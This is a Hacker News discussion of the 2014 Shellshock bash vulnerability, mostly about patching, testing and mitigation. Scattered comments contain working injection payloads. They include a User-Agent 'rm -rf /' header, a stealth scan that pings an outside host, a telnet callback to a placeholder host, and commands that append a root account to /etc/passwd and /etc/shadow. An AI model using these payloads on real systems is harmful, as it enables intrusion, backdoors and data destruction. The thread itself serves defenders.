Just did something similar with Ansible, the simple task "apt update_cache=yes pkg=bash state=latest" will do the trick. At least it did for me.

0x011y ago

The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929

Erwin11y ago

My findings so far: setting User-Agent to that new string and executing a .cgi script complains about: syntax error near unexpected token `newline' in `#!/bin/bash'. (My speculation is that we are in some kind of parsing context where no newlines are expected; none are given on the example bash -c ... line, but when you actually run a script there will be a newline).

I tried to change this to a Python script and instead use os.popen. Well, Ubuntu /bin/sh is "dash" so that's not affected.

I tried to explicitly call bash via os.popen("bash -c 'some command'") -- no go either, as that bash command started by parsing some /etc/bash.bashrc file and complaining about newlines there.

Finally I used os.popen("bash --norc -c '/tmp/file date'") -- and that ended up running "date > /tmp/file" from the CGI script.

I tried replacing /bin/sh by "bash" instead of dash. That now made the CGI script choke on reading some other RC files due to the unexpected newlines in the context bash starts with.

So the question from me still seems to be: what is the weird context setup by that environment setup, and what else can do you with it than to redirect $1 to $0 ?

Erwin11y ago

That works for me too. I was first unsure but breaking it up into an export Z=.... and then running bash -c 'echo date' on a separate line seems to execute essentially date > echo.

Can anyone explain what's going on there? Seems like defining a function within a nameless function; how does it end up with this redirect? I'm not sure what the exploitabiliy of this is; is it just essentially $1 > $0 ?

scintill7611y ago

The redirect at the end of the env var seems to be "remembered" even though the syntax error aborts the function definition, then the first arg is taken as the path to redirect to, and the following args as the command to execute. (I haven't dug into the actual parser, this is just my intuitive understanding.) It does seem to be about like $1 > $0, so not generally exploitable.

Here's an example using it to read files instead of write: https://news.ycombinator.com/item?id=8365205 But still, not as universal of an exploit as the original.

peterwwillis11y ago

Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something
  else outside your program--at least, not by accident. All command line
  arguments, environment variables, locale information (see perllocale),
  results of certain system calls (readdir(), readlink(), the variable
  of shmread(), the messages returned by msgrcv(), the password,
  gcos and shell fields returned by the getpwxxx() calls), and all
  file input are marked as "tainted".

  Tainted data may not be used directly or indirectly in any command
  that invokes a sub-shell, nor in any command that modifies files,
  directories, or processes, with the following exceptions:

phs250111y ago

Not true if the perl script calls out to bash (i.e. via system), as it doesn't sanitize the environment:

    $ env x='() { :;}; echo vulnerable' perl -T -e "\$ENV{PATH} = '/bin'; system('ls | cat');"  
    sh: warning: x: ignoring function definition attempt
    sh: error importing function definition for `x'
    ...

_b8r011y ago

My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test

fluidcruft11y ago

Doesn't OSX ship the 8-year-old bash 3.2 (2006) i.e. the last version available as GPLv2? (Apple hates GPLv3)

actionscripted11y ago

For me in 10.9.5:

  $ bash --version
  GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
  Copyright (C) 2007 Free Software Foundation, Inc.

1 more reply

x3ro11y ago

It does. I installed an up-to-date version with homebrew a few months ago, and it was vulnerable as well. After a `brew update && brew upgrade bash` I had the fix installed, though :)

jvreeland11y ago

If i remember correctly Apples stopped updating bash in OSX a long time ago I wonder if this will get fixed.

DEinspanjer11y ago

My OSX was vulnerable too, but I use Homebrew, and the latest version of bash available via brew update && brew upgrade is patched against this.

If you haven't already been using Homebrew though, you will likely need to move /usr/local/bin infront of /usr/bin in your path, otherwise the old bash would still be used.

gwillem11y ago

This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com'

Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

antocv11y ago

Maybe the bash is invoked on some other request path, not just / which you are scanning.

I would go with /login and such, or write a crawler to parse out where the login/logout URLs are and try those.

dremel11y ago

Would disabling CGI e.g. adding Option -ExecCIG to httpd.conf for Apache prevent exploitation via the web-server?

mr_brown11y ago

import os os.putenv("ANYTHING", "() { :;}; echo bu") os.system("bash")

If this works (and it does) that means it's enough for a CGI script to invoke bash. It doesn't even have to be written in bash.

AntiRush11y ago

It seems like the current patch might not be a complete fix:

http://seclists.org/oss-sec/2014/q3/671

fl0wenol11y ago

I think the default in bash should be to never execute the contents of environment variables (like the restricted shell mode allows). Does anyone know why it allows you to pass in shell functions this way? Does anything use it?

ilconsigliere11y ago

Am I wrong in thinking that seems a bit worse than Heartbleed?

jrochkind111y ago

The exploit is worse.

But I'm not sure how a scanner bot would find network accessible bashes to exploit. Seems like basically you need a cgi-bin with bash, and I don't think there's any way to predict a URL that is going to have such a thing.

Now, if there is some popular app that ends up vulnerable (perhaps because it shells out to bash), then that's definitely going to be huge.

But as it is... I'm not sure?

Erwin11y ago

You could search for *.cgi scripts indexed by Google. They may not be written IN Bash but maybe one of them opens up a shell to execute a command. Even if you are not explicitly passing any bad data to it, the environment will be passed and trigger this crazy vulnerability.

ilconsigliere11y ago

Makes sense. This just strikes me as a very flexible exploit.

jrochkind111y ago

okay, i was wrong, this is way way worse.

apawloski11y ago

Google inurl:cgi-bin inurl:.sh

1 more reply

jtdowney11y ago

It is far worse in the sense that it can lead to remote code execution. However, the number of vulnerable sites is far far fewer. Like Heartblead this one will likely have a very long tail of systems remaining vulnerable. My guess is we will see this vulnerability used to compromise big targets in the next few months.

throwaway4915211y ago

What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

baq11y ago

see http://seclists.org/oss-sec/2014/q3/651. can't say i understood much, but the answer i can give is 'likely'.

mdeeks11y ago

No, they would need a valid SSH account and password/key.

sauere11y ago

No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

hamiltonkibbe11y ago

Update for Ubuntu Server 14.04 is available

deathanatos11y ago

From just a functionality standpoint, how is even the patched version supposed to work? It seems to undefine the variable:

  % E='() { echo hi; }; echo cry' bash -c 'echo "-$E-"'
  bash: warning: E: ignoring function definition attempt
  bash: error importing function definition for `E'
  --

Since everyone's favorite example seems to be CGI scripts, doesn't this result in the script having no variable, as opposed to just a text one? Suddenly the script can break because an expected variable is no longer present simply because the input had a certain odd looking form?

In fact, if I wanted my variable to be a function, why wouldn't I just explicitly eval it? What's the use case at all for this functionality?

dholl11y ago

I got tired of the hype. How's the following code for a mitigation?

Basically, if some program does invoke /bin/bash, control first passes to this code which truncates suspicious environment variables. (and it dumps messages to the system log if/when it finds anything...)

The check should match for any variety of white space:

=(){

=() {

= ( ) {

etc... but feel free to update it for whatever other stupid things bash allows.

The code is at http://ad5ey.net/bash_shock_fix.c

Simple usage:

cd /bin

gcc -std=c11 -Wall -Wextra bash_shock_fix.c -o bash_shock_fix

mv bash bash.real

ln -s bash_shock_fix bash

phoenix(pts/1):~bin# ls -al bash*

lrwxrwxrwx 1 root root 14 Sep 27 00:23 bash -> bash_shock_fix

-rwxr-xr-x 1 root root 1029624 Sep 24 14:51 bash.real

-rwxr-xr-x 1 root root 9555 Sep 27 00:23 bash_shock_fix

-rw-r--r-- 1 root root 2990 Sep 27 00:23 bash_shock_fix.c

phoenix(pts/1):~bin#

jtchang11y ago

For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.

saurabhnanda11y ago

Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

detectify11y ago

We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.

detectify11y ago

We just released a complete quick-test for #shellshock here: https://shellshock.detectify.com/. It's free to use and here's the information about how the scanner works: goo.gl/8vp6eo

Please feedback here: https://news.ycombinator.com/item?id=8366643

ck211y ago

Has the redhat patch been pushed through centos yet?

cesarb11y ago

Apparently, no. When it does, it should appear at http://lists.centos.org/pipermail/centos-announce/2014-Septe... (if you admin CentOS servers, it can be a good idea to subscribe to that list).

skorgu11y ago

Yes: http://lists.centos.org/pipermail/centos-announce/2014-Septe...

Verify your shasums before trusting a command line off the internet but:

rpm -Uvh http://mirror.centos.org/centos-6/6/updates/x86_64/Packages/... http://mirror.centos.org/centos-6/6/updates/x86_64/Packages/...

1 more reply

Eiriksmal11y ago

It's out by now for both Centos 6 and 7. Ironically, their Redhat brethren on the Fedora 20 project haven't released an update yet.

smsm4211y ago

My CentOS now says "ignoring function definition attempt" after the upgrade, so I assume CentOS update is now out.

SchizoDuckie11y ago

I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

piratebroadcast11y ago

My friend tried it on Heroku - It is affected.

Sanddancer11y ago

Can someone with mod_security test a regex I wrote that should mitigate this? /$.?$\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.

jimrandomh11y ago

Your regex was damaged by HN's comment formatting. To get it to post correctly, put it on a line with four leading spaces.

Sanddancer11y ago

Repost, because HN "formatted" it for me

    /\((.*)?\)\s*\{(.*)?\}\s*\;/

I have qualms against redhat's fix, because it seems like it would create too many false positives, and additionally looks way too easy to work around just by adding spaces, etc.

fragmede11y ago

Redhat has some here: https://access.redhat.com/articles/1200223

1 more reply

kacy11y ago

Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

mirashii11y ago

At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.

milankragujevic11y ago

Here's an easy to use and reliable scanner to test if your website is vulnerable. http://milankragujevic.com/projects/shellshock/

kalops11y ago

so basically turn off AcceptEnv in sshd_config?

justincormack11y ago

Also don't use bash for running any scripts. You never should anyway, in a sane environment /bin/sh should not be bash - in Debian/Ubuntu it is dash which is not vulnerable. Unfortunately the Redhat derived distros do use bash as default /bin/sh. In the BSDs it is a standards compliant posix sh too. bash is for users not scripts.

5 more replies

nknighthb11y ago

By the time AcceptEnv has any effect, the user is already logged in and can run whatever they want anyway. If you're allowing untrusted users to authenticate to ssh, then, yeah, sure, but you'd be in a niche (and know it).

mdavidn11y ago

Don't forget SSH_ORIGINAL_COMMAND. GitHub and BitBucket had an exciting morning...

hijinks11y ago

I don't think so. From what I've been reading it can be exploited via http requests. I'm sure a metasploit script is right around the corner.

Edit: oh looks like only like mod_cgi related stuff is.. thats good then sort of

2 more replies

vhost-11y ago

For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

rurban11y ago

What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.

super_mario11y ago

Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    3.2.51(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    4.3.25(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

daveloyall11y ago

That's ... weird, since the phrase "ignoring function definition attempt" wasn't added to bash 3.2 until today, with patch level 52.

http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

Your paste indicates patch level 51.

The phrase in question doesn't appear on the internet much at all before today.

https://www.google.com/search?q="ignoring+function+definitio...

I presume that the one search result we see is due to a server that has an incorrect clock (or a time machine).

Fishkins11y ago

Hmm, I do see "vulnerable" print when I run that code on Mac OS X 10.9.5 with bash 3.2.51(1)-release.

aabdocker11y ago

I have same bash version and yet mine is vulnerable on OS X 10.10.

emmelaich11y ago

So proud of myself; my Python has env={} in the call to Popen().

The ultimate whitelist.

And they're executed with sudo but sudo empties out env vars with functions in them on the machines I use. Oldest is RHEL5.

snissn11y ago

Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash
  foo

ITGabs11y ago

env x='() { :;}; echo "johndoe:x:0:0::/root:/bin/sh" >>/etc/passwd' bash -c "echo this is just a test"

env x='() { :;}; echo "johndoe:\$6\$eM5eLwRC\$eZhb4x7sf1ctGjN1fXrpsusRHRKTHf/E15OA2Nr4TdTF9F0SS4ousy3WrPCI2ofdNoAonRnNPQ7Ja3FQ/:15997:0:99999:7:::" >>/etc/shadow' bash -c "echo this is just a test"

Hacked!!

but this only work from root :/ and johndoe xD

jacksoncage11y ago

Saved a lot of time again today with salt! $ salt * pkg.install bash refresh=True and then check for right version $ salt * pkg.version bash

jamiepenney11y ago

Looks like Raspian have updated their bash package with the fix, so my Raspberry Pi is safe.

javert11y ago

So if a machine is not running a web server, does that mean that machine is not vulnerable?

scott_karana11y ago

It might not be vulnerable, but any context where a user can pass environment variables might be dangerous.

Eg, if you allow ANY environment variables in SSH rsync-only logins, or pass on any variables (for good or bad) in sudo scripts, etc.

MichaelGG11y ago

No, all sorts of other network-facing systems can be vulnerable. Anything that ends up shelling out might pass some environment variables causing the problem. These things pop up in surprising places.

ars11y ago

No. Apparently ssh might be vulnerable.

FranOntanaya11y ago

Saucy wasn't patched by the time I did a do-release-upgrade a while ago.

pbrumm11y ago

Don't forget to update your docker containers and restart them.

mmagin11y ago

The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025

jdimov11y ago

All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?

frou_dh11y ago

Though it's no doubt rickety, conceptually I really like CGI. Talk about loose coupling.

korzun11y ago

FreeBSD appears to be affected.

sjackso11y ago

...if you've installed bash from ports. The base system doesn't appear to be affected.

1 more reply

rsync11y ago

A default installation of FreeBSD is not affected, as FreeBSD does not have bash installed by default.

piratebroadcast11y ago

Someone please ELI5 (Explain Like I'm 5)?

cdelsolar11y ago

You're very likely pwned. Upgrade immediately.

piratebroadcast11y ago

Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png

DCtn11y ago

You're not funny.

zobzu11y ago

I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

fabulist11y ago

Google brings up 410 .bash CGIs. Every one of them is almost guaranteed to be vulnerable at this point. Of the 1.2 million .sh CGIs, some are surely vulnerable. By this time, many of them are already be in the process of being owned.

CGIs are likely the smallest piece of the vulnerable hosts here. This is going to stick around as a local vulnerability on the plentiful supply of under-patched Linux boxes for a long time.

1 more reply

revelation11y ago

GitHub? I'm reminded of

https://gist.github.com/joernchen/a7c031b6b8df5d5d0b61

Of course that was fixed a long time ago, but I wonder what other systems are just a thin veneer over pretending the user controls a shell.

kazinator11y ago

Even if the malicious code doesn't have superuser context, it can do damage to whatever context it is running under. If it's running as www-data, it can trash all your www-data-owned files. Or send your www-data-owned password files somewhere, etc. Unprivileged code can also attack other systems (firewalls permitting); you don't have to be root on system A, to be part of a bot net which attacks system B. Denial-of-service havok can be wreaked from a regular user context, too. Not to mention privacy violations. Pretty much all browser-related security and privacy issues are user space!

adamt11y ago

As I understand this, any CGI script could be affected. Even if written in a different language if it turn does an os.system (or equivalent). More info here: https://securityblog.redhat.com/2014/09/24/bash-specially-cr... The permissions would only be as the web server user, but that allows all sorts of things to be run that are quite dangerous (resource exhaustion, attacking remote machines, downloading code and running it)

1 more reply

j / k navigate · click thread line to collapse

416 comments

daveloyall11y ago

There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on and OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

CSDude11y ago

I finally understand how it can be used.

jMyles11y ago

I'm sorry; perhaps I'm slow. I see the problem, but how can a stranger set an environment variable?

5 more replies

jimrandomh11y ago

matchu11y ago

vhost-11y ago

If you just want to upgrade bash, and prevent services like nginx, fpm, and apache from being restarted in production, you can run `sudo apt-get update && sudo apt-get install --only-upgrade bash`

Related to that, does anyone else know if upgrading bash will require a restart of other services kind of like upgrading openssl requires restarting things?

3 more replies

sauere11y ago

> Is `sudo apt-get update && sudo apt-get upgrade` sufficient on an Ubuntu server?

Yes. Patch is out.

5 more replies

clarry11y ago

I don't know if Ubuntu has pushed a patched version of bash, but bash is what you should update. Someone already posted a way to test whether your version is vulnerable.

You might also look into changing the default shell (but beware, scripts with bashisms in them...).

1 more reply

zobzu11y ago

you should update all security updates, reliably, periodically, regardless of HN posts.

1 more reply

cookiecaper11y ago

If you're still waiting for mirrors and such to sync, you can install these packages manually on the LTS releases with the snippet here:

http://hastebin.com/oraheyipug.hs

2 more replies

ilconsigliere11y ago

It will be once they release a patch, yes

https://security-tracker.debian.org/tracker/CVE-2014-6271

1 more reply

larrys11y ago

A good question that so far nobody has answered (as of right now).

larrys11y ago

"If you are responsible for the security of any system, this is your immediate, drop-everything priority."

[1] Me for one because I'm not seeing the "Drop everything" priority for any of the systems that I have control over given the way they are configured. That said I'd like to hear more of course.

tptacek11y ago

Helpful?

2 more replies

nandhp11y ago

Because this allows execution of arbitrary commands from any unsantized environment variable.

    GET / HTTP/1.0
    User-Agent: () { :; }; rm -rf /

    ssh git@example.com '() { :; }; rm -rf /'

There are surely lots of other ways to get servers to run bash shells with arbitrary environment variables. That's why this is bad.

4 more replies

maximumoverload11y ago

It doesn't have a nice catchy name and a logo, though

dsr_11y ago

Fine. Now it's called BashSmash. Are you happy? Go make a logo.

2 more replies

JoshTriplett11y ago

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'
    exploit

jimrandomh11y ago

peterwwillis11y ago

notacoward11y ago

JoshTriplett11y ago

Except that most environments already filter out attempts to control PATH, LD_LIBRARY_PATH, and similar; they don't filter out "git".

1 more reply

increment_i11y ago

I might be misunderstanding this, but this can be accomplished through http request headers?

1 more reply

sliverstorm11y ago

andrew1311y ago

It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo

https://twitter.com/taviso/status/514887394294652929#

env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

Negitivefrags11y ago

Can anyone confirm that this is still a security issue?

Does anyone have confirmation that this new bug allows you to RCE with control of the value of an environment variable alone?

timv11y ago

As best I can tell no one has (publicly) demonstrated a mechanism to turn this into an RCE (despite efforts to do so).

http://seclists.org/oss-sec/2014/q3/679

thaumaturgy11y ago

That was my initial reaction too, but I'm not so sure now that the bash maintainer has responded. I'm trying to get a better PoC working.

edit: OK, I give. I don't understand how this is different from,

    env z='' echo oops

So, assuming you have Stupid Server 2.0, and SS 2.0 allows you to send an Accept: header with,

    '' evil command here

...you still need to find a way to execute that command, which is different from CVE-2014-6271, which caused function embedded in environment variables to be executed when they were read.

Am I missing something?

1 more reply

timv11y ago

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014

Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit.

jMyles11y ago

Just tested on Ubuntu 14.04 patched.

"still vulnerable :("

timv11y ago

Chet (bash maintainer) says he has a fix.

http://seclists.org/oss-sec/2014/q3/682

andrew1311y ago

That's good news

caust1c11y ago

https://news.ycombinator.com/item?id=8365158

masterleep11y ago

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

mmastrac11y ago

Oh damn:

curl -H 'User-Agent: () { :;}; echo; echo vulnerable to CVE-2014-6271' <shell script CGI URL>

Tested and working against a shell script CGI.

darklajid11y ago

Whoa. I tried this, ran pacaur -Suy and .. it's patched.

Arch was fast.

gegenschall11y ago

If you're on Arch, you might want to think about using dash as your /usr/bin/sh after updating, see [0].

[0] https://wiki.archlinux.org/index.php/Dash

1 more reply

chjj11y ago

    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    vulnerable
    test
    $ pacman -Syu
    ...
    $ x='() { :;}; echo vulnerable' bash -c 'echo test'
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    test

Benefits of using an OS with a real package manager.

1 more reply

javert11y ago

I learned today that some mirrors update their package database a lot faster than others. Had to switch mirrors to get the new bash.

https://www.archlinux.org/mirrors/status/

dllthomas11y ago

It's fixed in Debian as well.

2 more replies

antocv11y ago

http://seclists.org/oss-sec/2014/q3/672

Still vulnerable.

env X='() { (lol)=>\' bash -c "echo id"; cat echo

wyager11y ago

This is what happens when you have two different processes doing IPC using a human interface mechanism.

cft11y ago

Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 0 25); do wget     http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz 
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
  #build and install
  ./configure && make && make install

Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

ak21711y ago

8.04 is unsupported, and situations like this justify the effort of upgrading it to the latest LTS.

rtmdivine11y ago

Enter this PoC in your terminal:

env var='() {(a)=>\' bash -c "echo date"; cat echo

A target patched for CVE-2014-6271 will output the date upon executing that PoC (Proof of Concept):

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'

Thu Sep 25 17:52:32 EDT 2014

mkdir src

cd src

wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz

#download all patches

for i in $(seq -f "%03g" 0 26); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done

tar zxvf bash-4.3.tar.gz

cd bash-4.3

#apply all patches

for i in $(seq -f "%03g" 0 26);do patch -p0 < ../bash43-$i; done

#build and install

sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install

Once patched for CVE-2014-7169 the previous PoC should not return the date anymore:

bash: var: line 1: syntax error near unexpected token `='

bash: var: line 1: `'

bash: error importing function definition for `var'

date

cat: echo: No such file or directory

And thanks to all previous contributors!

gklyne11y ago

This sequence failed for me because my Ubuntu 8.04 didn't have patch installed.

petercook11y ago

oows11y ago

I am running Ubuntu 10.10 but patch is not installed. Can someone explain the commands needed to download, build, and install patch as mentioned above. Thanks for any help.

1 more reply

ricilake11y ago

This won't work; you need

sudo make install

Given the circumstances, a lot of people without much software experience will be reading this message and simply copying and pasting; it's worth getting it right.

On Ubuntu, you'll probably want to ./configure --prefix=/usr/bin . If you install in /usr/local/bin (the default), bash will effectively no longer be updated by apt-get.

ricilake11y ago

That should probably have been ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc

Once upon a time, distributions documented their build configurations. Or maybe it's that I used to only use FreeBSD.

1 more reply

struct7611y ago

SylentBobNJ11y ago

I just wanted to say, "Thanks!"

I successfully patched my 8.04 server and passed the test.

I used sudo ./configure --prefix=/usr --bindir=/bin --sbindir=/sbin --sysconfdir=/etc && sudo make && sudo make install after retrieving and patching the bash build files.

imaginenore11y ago

Why is my bash version still 4.2.45(1) after this?

    # bash --version
    bash --version
    GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)

Though it seems the vulnerability got fixed.

degubellini11y ago

Hi, I have tried to follow the instruction given by rtmdivine to patch for CVE-2014-6271 but at the end of the process I still get the date. Any suggestions? Thanks

sergioalonso11y ago

In Debian Lenny you should also do at the end sudo rm /bin/bash && sudo ln -s /usr/local/bin/bash /bin/bash

mathx11y ago

need to wget all the patches including #26 to fix the 2nd bug reported. instead why not just wget the whole dir of patches..

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \\.sig index.html cd bash-4.3; for i in ../bash43-*; do patch -p0 < $i; done

etc

mathx11y ago

wtf. this damn form ate my 's and stuff.
try again:

wget -r 1 -nH -nd -np http://ftp.gnu.org/gnu/bash/bash-4.3-patches/ && rm \.sig index.html\*

should be no \'s (or \\s) before the *'s above.

1 more reply

rtmdivine11y ago

Does this fix CVE-2014-7169 as well, or just CVE-2014-6271?

agwa11y ago

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

asveikau11y ago

dllthomas11y ago

agwa11y ago

3 more replies

ForHackernews11y ago

Do you have a source for that? Some articles [0] claim "This affects Debian as well as other Linux distributions."

[0] http://www.csoonline.com/article/2687265/application-securit...

aroch11y ago

Debian7 doesn't look to be vulnerable by default (if the code snippet can be trusted to work):

    [arch/testbed ~] uname -a
    Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux
    [arch/testbed ~]  env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test

3 more replies

agwa11y ago

You're right and my comment was unclear. I'm just saying that the impact on Debian will be less than on distros using /bin/bash for /bin/sh. Of course, even a lessened impact can still be really bad!

ngcazz11y ago

Likely meaning that the Debian packages for Bash include the vulnerability

jkrems11y ago

Isn't /bin/sh vulnerable to the same thing? At least it seems for me:

    sh-3.2$ env x='() { :;}; echo vulnerable' /bin/sh -c "echo this is a test"
    vulnerable
    this is a test

joev_11y ago

1 more reply

korzun11y ago

Major impact of this is elevating privileges, both Debian and Ubuntu will be impacted just like any other system.

I don't think anybody is worried about software on the system that is using /bin/bash .vs /bin/sh.

dllthomas11y ago

Where is the privilege escalation? I get the same results from running id through tripping the bug as I do from running id directly.

Edited to add: Also no differences in capabilities when I cat /proc/self/status

None of which is to say there is clearly no such vulnerability - I'd just like to understand it if there is.

2 more replies

kazinator11y ago

Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

Basically this is a misfeature that must be rooted out, pardon the pun.

antocv11y ago

Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

scintill7611y ago

I replaced "sh" with "bash" in the above, and on my patched system it creates a file called "echo" with the date in it. Can anyone explain how this works? Is it an exploit?

codingbeer11y ago

I can't comprehend how this got buried so fast in the mist of "patch, patch, patch".

khaki5411y ago

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

dtech11y ago

It allows arbitrary code execution if an attacker can modify environment variables through other software.

Most webservers put certain HTTP headers in environment variables. I can certainly see the how this could be exploited.

Someone123411y ago

> Most webservers put certain HTTP headers in environment variables.

I legitimately don't understand why they might do such a thing. Can you explain?

2 more replies

ck211y ago

http://www.csoonline.com/article/2687265/application-securit...

adamt11y ago

On most systems I've found this works: LC_TIME='() { :;}; echo vulnerable' ssh <hostname>

MrUnderhill11y ago

_wmd11y ago

scintill7611y ago

graylights11y ago

Much easier to implement a custom captive shell (default login shell for user) then to mess with the crypto system.

1 more reply

thejosh11y ago

This is what Atlassian Stash does.

Eclyps11y ago

Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

rbliss11y ago

Still waiting for a fix on Beanstalk. Neither "yum clean all" followed by "yum update bash" nor "yum --releasever=2014.09 update bash" currently work.

EDIT: relevant AWS threads

https://forums.aws.amazon.com/thread.jspa?threadID=161489

https://forums.aws.amazon.com/thread.jspa?threadID=161529&ts...

rbliss11y ago

Should be fixed now:

To manually update EC2 instances managed by Elastic Beanstalk, you can run the following command:

For Amazon Linux 2013.09 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2013.09/updates/556c...

For Amazon Linux 2014.03 "sudo yum install -y http://packages.us-east-1.amazonaws.com/2014.03/updates/e10f...

marbletiles11y ago

If yum still doesn't find it, you may be on an older release. Try "yum --releasever=2014.09 update bash"

prothid11y ago

I'm considering pulling an rpm from elsewhere until they have this in place.

Eclyps11y ago

It's updated now

jingo11y ago

